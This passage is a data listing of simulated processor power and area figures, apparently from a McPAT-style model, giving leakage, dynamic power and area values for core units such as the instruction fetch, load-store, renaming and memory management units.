'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0134395,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0393685,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0952604,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.05938,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.360214,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.323547,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.57647,
'Instruction Fetch Unit/Runtime Dynamic': 0.831829,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0734183,
'L2/Runtime Dynamic': 0.0164294,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.12483,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.41181,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0934243,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0934243,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.5678,
'Load Store Unit/Runtime Dynamic': 1.96598,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.230368,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.460737,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0817585,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.082562,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.37675,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0599378,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.676593,
'Memory Management Unit/Runtime Dynamic': 0.1425,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.0499,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.38203e-05,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0189003,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.191359,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.210273,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.86579,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0495887,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.241638,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.265616,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.115524,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.186336,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0940563,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.395917,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0914043,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.47088,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0501805,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0048456,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0536937,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0358362,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.103874,
'Execution Unit/Register Files/Runtime Dynamic': 0.0406818,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.125518,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.311915,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.39553,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000350937,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000350937,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000322059,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00013364,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00051479,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00153872,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00277904,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0344503,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.19133,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0797619,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.117009,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.5162,
'Instruction Fetch Unit/Runtime Dynamic': 0.235539,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0462159,
'L2/Runtime Dynamic': 0.00399916,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.59016,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.654742,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.043774,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.043774,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.79687,
'Load Store Unit/Runtime Dynamic': 0.914394,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.107939,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.215879,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0383079,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0390002,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.136249,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0130814,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.358164,
'Memory Management Unit/Runtime Dynamic': 0.0520816,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.7778,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.132002,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00681857,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0567221,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.195543,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.79709,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0980777,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.279723,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.621299,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.189316,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.30536,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.154135,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.648812,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.121269,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.10233,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.117377,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00794077,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.090414,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0587269,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.207791,
'Execution Unit/Register Files/Runtime Dynamic': 0.0666677,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.215002,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.561929,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.96251,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 2.12418e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 2.12418e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.8525e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 7.18413e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000843616,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
